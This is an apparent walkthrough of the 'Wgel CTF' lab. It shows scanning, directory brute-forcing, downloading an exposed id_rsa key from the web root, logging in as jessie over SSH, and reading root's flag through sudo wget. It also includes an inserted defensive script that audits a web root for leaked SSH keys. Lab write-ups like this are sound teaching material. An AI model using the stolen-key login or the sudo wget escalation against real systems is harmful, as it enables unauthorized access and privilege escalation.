CTF Wgel CTF

  1. Rustscan
  2. Browse the website
  3. Gobuster
  4. Download id_rsa
  5. SSH
  6. First flag
  7. root flag

Rustscan

rustscan -a 10.10.227.219

Browse the website

This is the default page.

We have a user, Jessie.

Gobuster

gobuster dir -u http://10.10.227.219/. -x txt,html,php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Let’s run another scan in sitemap.
I’ve tried with the same wordlist but nothing came out.
So I’m using another one.

gobuster dir -u http://10.10.227.219/sitemap -x txt,html,php -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt 

Download id_rsa

wget http://10.10.227.219/sitemap/.ssh/id_rsa
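
The key could be fetched because a .ssh directory sat inside the web root. A check an administrator could run over the document root to catch this, as an added example that is not part of the original write-up; the function names and the /var/www/html path are assumptions:

```shell
#!/bin/sh
# Added example, not part of the original write-up.
# Audits a web document root for SSH material the server could hand out,
# like the /sitemap/.ssh/id_rsa file fetched above.

# PEM/OpenSSH private key header (RSA, EC, DSA, OPENSSH, ENCRYPTED, PKCS#8).
KEY_HEADER='^-----BEGIN ([A-Z0-9]+ )*PRIVATE KEY-----'

# List files under $1 that contain a private key header.
find_private_keys() {
    find "$1" -type f -exec grep -lE -e "$KEY_HEADER" {} + 2>/dev/null || true
}

# List directories named .ssh under $1.
find_ssh_dirs() {
    find "$1" -type d -name .ssh 2>/dev/null || true
}

# Print findings for docroot $1; return 1 if anything was found, else 0.
audit_docroot() {
    keys=$(find_private_keys "$1")
    dirs=$(find_ssh_dirs "$1")
    if [ -z "$keys" ] && [ -z "$dirs" ]; then
        echo "OK: no SSH material under $1"
        return 0
    fi
    if [ -n "$dirs" ]; then
        echo "$dirs" | sed 's/^/SSH directory in web root: /'
    fi
    if [ -n "$keys" ]; then
        echo "$keys" | sed 's/^/Private key in web root: /'
    fi
    return 1
}

# Usage: ./audit_docroot.sh /var/www/html   (path is an assumption)
if [ "$#" -ge 1 ]; then
    audit_docroot "$1"
fi
```

The non-zero exit status on a finding lets the script fail a deployment job or cron check. Any key it reports should be treated as compromised and replaced, not just moved.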

SSH

chmod 600 id_rsa
ssh -i id_rsa jessie@10.10.227.219 

First flag

There is no tabulation.

root flag

sudo /usr/bin/wget -i /root/root_flag.txt

https://gtfobins.github.io/gtfobins/wget/